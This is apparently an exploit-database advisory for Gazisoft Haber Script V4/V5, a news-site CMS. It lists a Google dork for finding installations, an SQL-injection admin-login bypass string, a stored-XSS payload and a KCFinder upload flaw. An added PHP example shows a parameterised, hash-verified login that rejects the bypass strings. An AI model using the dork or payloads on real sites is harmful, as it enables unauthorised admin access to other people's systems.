######################
# Exploit Title :  Gazisoft Haber Script V5 - Multiple Vulnerabilities
# Exploit Author : Persian Hack Team
# Vendor Homepage :  https://www.gazisoft.com/php-haber-yazilimi.html
# Google Dork : intext:" Sistem : Gazisoft" inurl:kunye.html
# Date: 2016/03/14
# Version : V4 , V5
######################
# PoC:
# 1-Admin Bypass
# Username : '=' 'or'
# Password : '=' 'or'
# Demo: 
#
# 2-XSS
# Login and go to >> Genel Ayarlarınız >> Site Meta HTML >>
# Payload : <script>alert("D:");</script>
#
# 3-KCFinder Upload
# Demo : 
######################
# Discovered by :
# Mojtaba MobhaM ([email protected])
# T3NZOG4N ([email protected])
# Homepage : persian-team.ir
###################### 
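
# Added example, not part of the original advisory and not Gazisoft's code: the strings in item 1 are a SQL injection against the admin login, and the fix is to bind the credentials as parameters and verify a stored password hash.
# Assumptions: the table, column and function names are hypothetical, and an in-memory SQLite database stands in for the product's database so the block runs offline.

```php
<?php
declare(strict_types=1);

// Hypothetical schema: the product's real table and column names are not in the advisory.
function make_demo_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    // With MySQL, also set PDO::ATTR_EMULATE_PREPARES to false for server-side binding.
    $db->exec('CREATE TABLE admins (id INTEGER PRIMARY KEY, username TEXT UNIQUE, pass_hash TEXT)');
    $ins = $db->prepare('INSERT INTO admins (username, pass_hash) VALUES (?, ?)');
    // Constructed sample account; only the hash is stored, never the password.
    $ins->execute(['editor', password_hash('constructed-sample-password', PASSWORD_DEFAULT)]);
    return $db;
}

// Returns the admin id on success, null on any failure.
function admin_login(PDO $db, string $username, string $password): ?int
{
    static $dummyHash = null;
    if ($dummyHash === null) {
        $dummyHash = password_hash('no-such-user', PASSWORD_DEFAULT);
    }

    // The user name is bound as data, so quotes and "or" cannot change the query.
    $stmt = $db->prepare('SELECT id, pass_hash FROM admins WHERE username = :u LIMIT 1');
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // Verify against a dummy hash for unknown users so both paths do the same work.
    $hash = ($row === false) ? $dummyHash : $row['pass_hash'];
    $ok = password_verify($password, $hash);

    return ($row !== false && $ok) ? (int) $row['id'] : null;
}

// Constructed test inputs: one valid login and the strings listed in item 1.
$db = make_demo_db();
$cases = [
    ['editor', 'constructed-sample-password'],
    ["'=' 'or'", "'=' 'or'"],
    ['editor', "'=' 'or'"],
];
foreach ($cases as [$u, $p]) {
    $result = admin_login($db, $u, $p) === null ? 'rejected' : 'accepted';
    printf("%-12s %s\n", $u, $result);
}
```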

# siph0n [2016-03-21]